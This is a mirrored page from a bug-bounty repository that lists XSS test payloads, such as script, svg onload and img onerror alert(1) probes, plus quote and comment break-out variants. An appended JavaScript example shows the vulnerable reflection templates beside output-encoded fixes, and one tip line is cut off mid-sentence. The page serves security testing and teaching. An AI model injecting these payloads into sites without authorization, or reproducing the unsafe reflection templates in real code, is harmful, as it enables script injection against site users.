mirror of
https://github.com/daffainfo/AllAboutBugBounty.git
synced 2024-12-24 21:35:25 +00:00
74b4c4b2eb
Add 3 tips
XSS Payloads
- Basic payload
<script>alert(1)</script>
<svg/onload=alert(1)>
<img src=x onerror=alert(1)>
- Add ' or " to break the payload out of the value of an HTML tag attribute
"><script>alert(1)</script>
'><script>alert(1)</script>
- Example source code
<input id="keyword" type="text" name="q" value="REFLECTED_HERE">
- After the payload is submitted
<input id="keyword" type="text" name="q" value=""><script>alert(1)</script>
- Add --> to break the payload out when the input lands inside an HTML comment.
--><script>alert(1)</script>
- Example source code
<!-- REFLECTED_HERE -->
- After the payload is submitted
<!-- --><script>alert(1)</script> -->
- Add when the input inside or between opening/closing tags, tag can be ,<title, when input inside
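The attribute-value and HTML-comment cases above, seen from the rendering side, as an added example that is not part of the original repository: the reflecting templates next to output-encoded versions. Function names are hypothetical, and the sample inputs are the payloads already listed on this page.

```javascript
// Added example, not code from the original repository; all names are hypothetical.

// Encode the five characters that can end a quoted attribute value,
// open a tag, or close a comment.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  }[c]));
}

// Vulnerable: input is reflected verbatim into a double-quoted attribute value.
function renderInputUnsafe(q) {
  return `<input id="keyword" type="text" name="q" value="${q}">`;
}

// Hardened: the attribute stays quoted and the value is entity-encoded,
// so neither " nor ' can terminate it.
function renderInputSafe(q) {
  return `<input id="keyword" type="text" name="q" value="${escapeHtml(q)}">`;
}

// Vulnerable: input is reflected verbatim into an HTML comment.
function renderCommentUnsafe(s) {
  return `<!-- ${s} -->`;
}

// Hardened: with > encoded the input cannot form --> and end the comment.
// Not reflecting input into comments at all is the simpler fix.
function renderCommentSafe(s) {
  return `<!-- ${escapeHtml(s)} -->`;
}

// Simple check used for the demo: does the output contain a live script tag?
function hasInjectedScript(html) {
  return html.includes("<script>");
}

// Sample inputs taken from the list above.
const attrInput = '"><script>alert(1)</script>';
const commentInput = "--><script>alert(1)</script>";

console.log(renderInputUnsafe(attrInput), hasInjectedScript(renderInputUnsafe(attrInput)));
console.log(renderInputSafe(attrInput), hasInjectedScript(renderInputSafe(attrInput)));
console.log(renderCommentUnsafe(commentInput), hasInjectedScript(renderCommentUnsafe(commentInput)));
console.log(renderCommentSafe(commentInput), hasInjectedScript(renderCommentSafe(commentInput)));
```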